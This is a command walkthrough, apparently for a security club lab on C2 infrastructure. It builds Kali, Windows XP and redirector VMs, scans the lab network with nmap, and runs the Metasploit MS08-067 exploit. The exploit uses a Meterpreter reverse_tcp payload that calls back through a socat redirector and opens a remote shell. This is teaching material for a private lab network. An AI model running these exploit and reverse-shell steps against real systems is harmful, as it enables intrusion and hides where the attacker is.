wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017-2018/Fall/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -O Vagrantfile

curl https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017-2018/Fall/01-Intermediate-Monday/08-C2-Infra/Vagrantfile -o Vagrantfile

wget https://raw.githubusercontent.com/49thSecurityDivision/slideshows/master/2017-2018/Fall/01-Intermediate-Monday/08-C2-Infra/Vagrantfile

vagrant up

vagrant ssh winxp -- -oKexAlgorithms=+diffie-hellman-group1-sha1
ipconfig

vagrant ssh redir
sudo socat TCP4-LISTEN:443,fork TCP4:192.168.55.2:443

vagrant global-status

vagrant ssh kali
ifconfig
nmap -sT -O 192.168.55.0/24 -oA initial-network
ls

use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp         # This is the payload I set
show options                                        # This shows all the options for the payload and exploit
set RHOST 192.168.55.3                              # The host you are attacking
set LHOST 192.168.55.4                              # The external IP that the payload should connect to
set LPORT 443                                       # External port that the payload will connect to
set ReverseListenerBindAddress 192.168.55.2         # The internal IP address of the kali box that's being NAT'd
set ReverseListenerBindPort 443
set ExitOnSession false                             # Don't stop the handler once a session is established (allows you to receive multiple sessions for a handler)
exploit -j -z                                       # Start the exploit as a job. Do not automatically interact with new sessions.

## after you have your session do this to see and interact with it.
sessions -l
# connect to whatever your session number is that displays below
sessions -i 1
# to interact with your exploited host
shell
# to show that the metasploit module isn't connected to your machine
netstat